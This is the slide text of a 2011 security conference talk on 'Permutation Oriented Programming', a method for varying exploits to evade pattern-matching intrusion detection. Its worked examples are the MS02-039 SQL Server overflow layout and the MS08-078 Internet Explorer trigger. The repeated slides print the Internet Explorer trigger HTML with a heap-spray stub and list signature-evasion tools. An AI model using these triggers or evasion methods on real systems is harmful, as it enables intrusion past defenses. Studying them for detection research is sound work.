SlideShare a Scribd company logo

Vale Security Conference - 2011 - 13 - Nelson Brito

Vale Security Conference
Vale Security Conference

Vale Security Conference - 2011 Domingo - 13ª Palestra Palestrante : Nelson Brito Palestra : Permutation Oriented Programming : (Re)searching for alternatives! Twitter (Nelson Brito) : https://twitter.com/#!/nbrito Video (YouTube) : http://www.youtube.com/watch?v=YO9no20SKtk Slide (SlideShare) : http://www.slideshare.net/valesecconf/nelson-brito

Technology
1 of 125
Download to read offline
Agenda • 0000 – A long time ago… • 0100 – Demonstration • 0001 – Introduction • 0101 – Conclusions • 0010 – Brain at work • 0110 – Testimonial • 0011 – Approach • 0111 – Questions and Answers
nbrito@pitbull:~$ whoami • Nelson Brito: • Computer/Network Security Researcher Enthusiast • Spare-time Security Researcher • Addict for systems’ (in)security • sekure SDI • Home town: • Rio de Janeiro • Public tools: • T50: an Experimental Mixed Packet Injector • Permutation Oriented Programming • ENG++ SQL Fingerprint™ • WEB: • http://about.me/nbrito
A long time ago, in a galaxy far, far away…
Before starting 0-Day Pattern-matching • 0-day is cool, isn’t it? But only if nobody is aware of its • This technology is as need today as it was in the past, existence. but the security solution cannot rely only on this. • Once the unknown vulnerability becomes known, the • No matter how fast is the pattern-matching 0-day will expire – since a patch or a mitigation is algorithm, if a pattern does not match, it means that released (which comes first). there is no vulnerability exploitation. • So we can conclude that, once expired (patched or • No vulnerability exploitation, no protection action… mitigated), 0-day has no more value. If you do not But what if the pattern is wrong? believe me, you can try to sell a well-known vulnerability to your vulnerability-broker. • How can we guarantee that the pattern, which did not match, is the correct approach for a protection • Some security solutions fight against 0-day faster action? Was the detection really designed to detect than the affected vendor. the vulnerability?
Some concepts Exploitation Vulnerability • There are lots of good papers and books describing • Any vulnerability has a trigger, which leads the the exploitation techniques. Thus, I do recommend vulnerability to a possible and reasonable exploitation. you to look for them for a better understanding. • For some weakness types the vulnerability allows to • This lecture has no pretension of being a complete control the flow of software’s execution, executing reference for this topic. an arbitrary code (shellcode), such as: CWE-119, CWE- 120, CWV-134, CWE-190, CWE-196, CWE-367, etc. • The exploitation path described here is something that I decided to follow, and it helped me to • Before executing a shellcode, the exploitation must understand and apply POP (f.k.a. ENG++) to the deal with the vulnerable ecosystem (trigger, return vulnerabilities. address, etc…), performing memory manipulation on additional entities (such as: offset, register, • All the definitions are in compliance with: JUMP/CALL, stack, heap, memory alignment, memory padding, etc). – Common Vulnerabilities and Exposures. – Common Vulnerability Scoring System. – Common Weakness Enumeration.
Current evasion techniques (a.k.a. TT) Techniques Tools • Packet fragmentation • Fragroute / Fragrouter / Sniffjoke • Stream segmentation • ADMutate / ALPHA[2-3] / BETA3 / Others • Byte and traffic insertion • Whisker / Nikto / Sandcat • Polymorphic shellcode • Snot / Stick / IDS-wakeup / Others • Denial of Service • Sidestep / RPC-evade-poc.pl / Others • URL obfuscation (+ SSL encryption) • Predator (AET) • RPC fragmentation • Etc… • HTML and JavaScript obfuscation • Etc…
What is Permutation Oriented Programming? The scenario The technique • Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected • This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Harder: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem). • Sometimes, even vendors might adopt pattern- matching to release a mitigation (workaround) while working on a correct patch. • Permutation Oriented Programming: – Deep analysis of a vulnerability, (re)searching • People’s hope, consequently their security strategy, for alternatives. resides on this security model: vulnerability mitigated, – Use all the acquired knowledge and alternatives no patch… to offer a variety of decision points (variants). – Intended to change the behavior of exploit • But what if an old and well-known vulnerability could developers. be exploited, even on this security approach model? – Use randomness to provide unpredictable payloads, i.e., permutation. • According to pattern-matching, any new variant of an old vulnerability exploitation is considered a new vulnerability, because there is no pattern to be matched yet!
What is Permutation Oriented Programming? The scenario The technique • Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected • This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Harder: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem). • Sometimes, even vendors might adopt pattern- matching to release a mitigation (workaround) while working on a correct patch. • Permutation Oriented Programming: – Deep analysis of a vulnerability, (re)searching • People’s hope, consequently their security strategy, for alternatives. resides on this security model: vulnerability mitigated, – Use all the acquired knowledge and alternatives no patch… to offer a variety of decision points (variants). – Intended to change the behavior of exploit • But what if an old and well-known vulnerability could developers. be exploited, even on this security approach model? – Use randomness to provide unpredictable payloads, i.e., permutation. • According to pattern-matching, any new variant of an old vulnerability exploitation is considered a new vulnerability, because there is no pattern to be matched yet!
What is Permutation Oriented Programming? The scenario The technique • Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected • This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Easier: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem). • Sometimes, even vendors might adopt pattern- matching to release a mitigation (workaround) while working on a correct patch. • Permutation Oriented Programming: – Deep analysis of a vulnerability, (re)searching • People’s hope, consequently their security strategy, for alternatives. resides on this security model: vulnerability mitigated, – Use all the acquired knowledge and alternatives no patch… to offer a variety of decision points (variants). – Intended to change the behavior of exploit • But what if an old and well-known vulnerability could developers. be exploited, even on this security approach model? – Use randomness to provide unpredictable payloads, i.e., permutation. • According to pattern-matching, any new variant of an old vulnerability exploitation is considered a new vulnerability, because there is no pattern to be matched yet!
POP (pronounced /pŏp/) technique The truth The examples • POP technique deals with vulnerable ecosystem and • Server-side vulnerabilities: memory manipulation, rather than shellcode. – MS02-039: CVE-2002-0649/CWE-120. – MS02-056: CVE-2002-1123/CWE-120. • POP is neither a new polymorphic shellcode technique, nor an obfuscation technique: • Client-side vulnerabilities: – Shellcode is the last thing the exploitation – MS08-078: CVE-2008-4844/CWE-367. and/or detection should care about. – MS09-002: CVE-2009-0075/CWE-367. – Obfuscation is not an elegant technique to apply to an exploitation. • Windows 32-bit shellcodes: • POP technique can be applied to work with Rapid7 – 波動拳: “CMD /k”. Metasploit Framework, CORE Impact Pro, Immunity – 昇龍拳: “CMD /k set DIRCMD=/b”. CANVAS Professional, and regular stand-alone proof-of-concepts (freestyle coding). • All example modules were ported to work with Rapid7 Metasploit Framework, but there are also • POP technique maintains the exploitation reliability, examples for client-side in HTML and JavaScript. even using random decisions, it is able to achieve all exploitation requirements.
What if… exploit #1
What if… exploit #1 exploit #2
What if… exploit #1 exploit #N exploit #2
What if… exploit #1 exploit #N exploit #2 shared zone
What if… exploit #1 exploit #N exploit #2 shared zone
What if… exploit #1 exploit #N exploit #2 shared zone Permutation Oriented Programming
Vulnerabilities MS02-039 MS08-078 • Common Vulnerabilities and Exposures: • Common Vulnerabilities and Exposures: – CVE-2002-0649. – CVE-2008-4844. • Common Weakness Enumeration: • Common Weakness Enumeration: – CWE-120. – CWE-367. • CVSS Severity: 7.5 (HIGH). • CVSS Severity: 9.3 (HIGH). • Target: • Target: – Microsoft SQL Server 2000 SP0-2. – Microsoft Internet Explorer 5.01 SP4, 6 SP0-1, 7 and 8 Beta 2. • Vulnerable ecosystem: – Protocol UDP. • Vulnerable ecosystem: – Communication Port 1434. – XML Data Island feature enabled (default). – SQL Request CLNT_UCAST_INST. – DHTML with embedded Data binding. – INSTANCENAME >= 96 bytes. – XML Data Source Object (DSO). – INSTANCENAME != NULL. – Data Consumer (HTML element) pointing to a dereferenced XML DSO.
Vulnerabilities MS02-039 MS08-078 • Common Vulnerabilities and Exposures: • Common Vulnerabilities and Exposures: – CVE-2002-0649. – CVE-2008-4844. • Common Weakness Enumeration: • Common Weakness Enumeration: – CWE-120. – CWE-367. • CVSS Severity: 7.5 (HIGH). • CVSS Severity: 9.3 (HIGH). • Target: • Target: – Microsoft SQL Server 2000 SP0-2. – Microsoft Internet Explorer 5.01 SP4, 6 SP0-1, 7 and 8 Beta 2. • Vulnerable ecosystem: – Protocol UDP. • Vulnerable ecosystem: – Communication Port 1434. – XML Data Island feature enabled (default). – SQL Request CLNT_UCAST_INST. – DHTML with embedded Data binding. – INSTANCENAME >= 96 bytes. – XML Data Source Object (DSO). – INSTANCENAME != NULL. – Data Consumer (HTML element) pointing to a dereferenced XML DSO.
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability 0x04 request memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump address padding additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address jump padding writable address Trigger additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address jump padding writable address Permutation additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding Exploitation overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
<XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer (Data Consumers) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::CRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CCurrentRecordConsumer::Bind DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CCurrentRecordInstance::GetCurrentRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::CreateBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::AddBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CImplPtrAry::Append DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CRecordInstance::CRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CCurrentRecordConsumer::Bind DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CCurrentRecordInstance::GetCurrentRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CXfer::CreateBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CRecordInstance::AddBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CImplPtrAry::Append DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::TransferToDestination DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
